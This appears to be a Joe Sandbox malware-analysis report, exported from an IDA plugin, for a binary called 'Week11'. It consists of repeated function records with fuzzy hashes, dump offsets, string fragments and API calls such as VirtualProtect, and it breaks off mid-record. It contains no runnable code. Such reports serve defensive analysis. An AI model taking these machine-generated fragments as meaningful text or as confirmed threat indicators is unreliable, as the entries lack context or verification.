                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 143dd6ccf4d79b50f94dcfa26198671efae58d8fef0ee1bb9550ecdefae7407c
                                • Instruction ID: 66760c9ffb211aed5804c93875a196225b66918cac4555018ca68b065f2e8d13
                                • Opcode Fuzzy Hash: 143dd6ccf4d79b50f94dcfa26198671efae58d8fef0ee1bb9550ecdefae7407c
                                • Instruction Fuzzy Hash: 1CE100B1D086A88BE7208B24DC44BEABB71EF92300F1541FED44D57682E6795EC6CF16
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
                                • Instruction ID: 6a14bf4a3eb04cae67c5b51e01bc356d3a9fc6386e4db02237bdbedde460ddb0
                                • Opcode Fuzzy Hash: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
                                • Instruction Fuzzy Hash: EBD123B2D086A88BE7208B24DC44BEABB75EF91300F1140FED44D57682E67D5EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
                                • Instruction ID: 5f5209ed909375d2139a258b2c59d0ee9bc9ae30a4be132ece142089bc88a00e
                                • Opcode Fuzzy Hash: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
                                • Instruction Fuzzy Hash: B1D113B1D086A88BE7208B24DC44BEABB75EF92300F1540FED44D57682E67D4EC6CB16
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: C3>7$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-1595673557
                                • Opcode ID: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
                                • Instruction ID: d022b2152a70e6700430846171d83ef6987ce2c28b84a06d3bfb48d66a714060
                                • Opcode Fuzzy Hash: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
                                • Instruction Fuzzy Hash: 90129EB4D052688BEB24CB25CC90BEAB7B6FF85304F1481EAD84D97241D6399EC1CF55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
                                • Instruction ID: df25959187cdc0d00ec56647ca006b026fe1f554ef3b5b137ac4aef6aafe0e35
                                • Opcode Fuzzy Hash: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
                                • Instruction Fuzzy Hash: 62D121B2D082A88BE7208B24DC44BEABB71EF91310F1580FED44D57682D67D5EC6CB56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
                                • Instruction ID: 34e4525c590ddcfbfe39821ef2b45606b161f9d4a11c1f324315865f6483a5db
                                • Opcode Fuzzy Hash: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
                                • Instruction Fuzzy Hash: 33C110B1E086A88BE7208B24DC44BEABB71EF91300F1580FED44D57682D6795FC6CB56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
                                • Instruction ID: 5cdbee90e8e9be711707fb62406c117affafcb95e78e99f747a3dcfd54370fdd
                                • Opcode Fuzzy Hash: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
                                • Instruction Fuzzy Hash: 30A113B1D086A48AF7218B25DC447EABB71EF51300F0580FEC48D57682D67D4BC68B56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-3635020934
                                • Opcode ID: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
                                • Instruction ID: 3aeec92c3109fb574ea902bd1338bc9d1cbacae3b450ecab5661731baad3006d
                                • Opcode Fuzzy Hash: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
                                • Instruction Fuzzy Hash: D7C1F2B1D042A88AEB208B25CC447EABBB1EF51300F1581FED44D97682E67D4BC6CF56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
                                • Instruction ID: 8b635cbb95621562d18b193e08c002f6368445e3de0c633ddc3054a69fb55711
                                • Opcode Fuzzy Hash: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
                                • Instruction Fuzzy Hash: 8AC122B1D046A88BEB208B25DC44BEABB71EF51300F1181FEC44D97682D63D5BC68F5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$u@W$y
                                • API String ID: 0-1928072818
                                • Opcode ID: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
                                • Instruction ID: 6392f3a9208d1e8179c5a805427b9ef258a7f36b1befd5b71f5a0c196174c521
                                • Opcode Fuzzy Hash: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
                                • Instruction Fuzzy Hash: FDB103A1E082589AF7208B24CC84BEA7B75FF91300F1481FAD84DA7281D67D5ED5CF66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
                                • Instruction ID: 95268a50d603b0a11159b566f8c4c9e0da5fb0067bbd7fd0ba00e815549d5fdb
                                • Opcode Fuzzy Hash: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
                                • Instruction Fuzzy Hash: F2A103B1D086A88AFB208B25DC447EABB71EF51300F1581FEC44D97682D67D4FC68B66
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
                                • Instruction ID: 034f64877c1c350d937159032d42a52ac2eab4a46e4d8e0f2cafc8c92848ec2e
                                • Opcode Fuzzy Hash: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
                                • Instruction Fuzzy Hash: 01A1D1B1E052689AFB20CB25DC54BEAB6B5EF95300F0480FAD84CA7281D6795FC1CF56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
                                • Instruction ID: 7236bf87cbc82dcb22f518eeef784d94e1277f173809f8301387256e240a2ef5
                                • Opcode Fuzzy Hash: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
                                • Instruction Fuzzy Hash: 2091DFB1E052A49FF720CA24DC54BEAB6B5EF95300F0480FAD44C9B681D67A5BC18F56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
                                • Instruction ID: 4448a334db9ed665aba4fbb0b726f790aa21762421452469d73c0e0e51316350
                                • Opcode Fuzzy Hash: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
                                • Instruction Fuzzy Hash: 8F8115B1D096A88BE7218B25DC447EABB75EF51300F1580FEC44C97682D67D4FC68B26
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-3635020934
                                • Opcode ID: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
                                • Instruction ID: 48de20c76db8c3de671630d63b886f22b0c06a9148901f48d914f27b83d1fb03
                                • Opcode Fuzzy Hash: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
                                • Instruction Fuzzy Hash: 736117B1D096A88AF7218B25DC447EABB75EF51300F1480FEC44C97682D67E4FC68B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
                                • Instruction ID: ced5aa437ee35238d930c7b104e160baf39eb88925bb8b05c2a6ef6763ec6812
                                • Opcode Fuzzy Hash: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
                                • Instruction Fuzzy Hash: 3171E4A1E083989EF7208624CC84BEB7B75EF91300F0541FAD48D67681D67E1FD58B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
                                • Instruction ID: 6c2571c954ef4d03a8d8fed5108f159e5fbdfac35f81ed42c821c525546270d9
                                • Opcode Fuzzy Hash: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
                                • Instruction Fuzzy Hash: 9C71F4A1E083989EF7208624CC84BEB7B75EF92304F0441FAD48D67681D67E1FD58B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
                                • Instruction ID: fe841b6793d8beded5587f449d57caddeb69ca6b736605e5fabbf832e423c488
                                • Opcode Fuzzy Hash: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
                                • Instruction Fuzzy Hash: FB71E461E083989EF7208624CC84BEB7B75EF92300F0481FAD48D67681D67E1FD58B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
                                • Instruction ID: 73b9da147c84c11f77d225f4121026b3fa65a4ee4fbc036ab2decc08f9526212
                                • Opcode Fuzzy Hash: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
                                • Instruction Fuzzy Hash: 3F71C3A1E083989AF7208624CC847EA7B75EF91304F0480FAD48D67681D67E5FD58B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
                                • Instruction ID: 5ea93c5cef2c5e65ef2b2574122109ce581030336684adb32c555981ce0bf4e4
                                • Opcode Fuzzy Hash: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
                                • Instruction Fuzzy Hash: 7961D661E08398DEF7208624CC84BEA7B75EF91300F0481FAD48DA7681D67E5FD58B66
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: a
                                • API String ID: 2949231068-3904355907
                                • Opcode ID: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
                                • Instruction ID: c649a5e9774caa28317db665e42282bf5a18610ef2299b6222cde23d22d20275
                                • Opcode Fuzzy Hash: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
                                • Instruction Fuzzy Hash: FAF181B1D086288BDB24CF14CC94AEAB7B1FB85301F1481EAD84D67645D7385EC2CF55
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
                                • Instruction ID: fc210762df59391765cc8805784750e672337dfb326893282e5de2c061f102c8
                                • Opcode Fuzzy Hash: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
                                • Instruction Fuzzy Hash: 1291D2B1C082699BD7208B24CC947EBBBB4EF45310F1441FAD94DA7681E6388EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
